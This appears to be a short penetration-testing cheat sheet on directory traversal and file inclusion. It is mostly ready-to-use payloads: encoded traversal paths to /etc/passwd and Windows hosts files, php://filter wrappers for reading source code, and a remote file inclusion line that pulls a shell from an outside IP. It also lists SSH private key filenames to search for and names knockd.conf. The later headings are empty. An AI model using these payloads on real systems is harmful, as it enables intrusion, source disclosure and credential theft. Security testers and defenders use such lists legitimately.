Directory Traversal

  1. View users on machine

  2. Search for SSH Keys

  3. Search for passwords in log or configuration files (.htaccess, config.php)

../../../../../../../../../etc/passwd
../../../../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts
\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts
php://filter/resource=/etc/passwd
php://filter/convert.base64-encode/resource=about.html
php://filter/read=string.rot13/resource=index.php
index.php?page=http://10.10.14.10/shell.txt

Port knocking ; trigger ports to open from executing port knocking file

/etc/knockd.conf

SSH

SSH keys are also stored under C:\Users\user\.ssh

id_rsa
id_ecdsa
id_ecdsa_sk
id_ed25519
id_ed25519_sk
id_dsa

HTTPD, Apache2, Nginx

IIS

Linux user specific

Windows

Last updated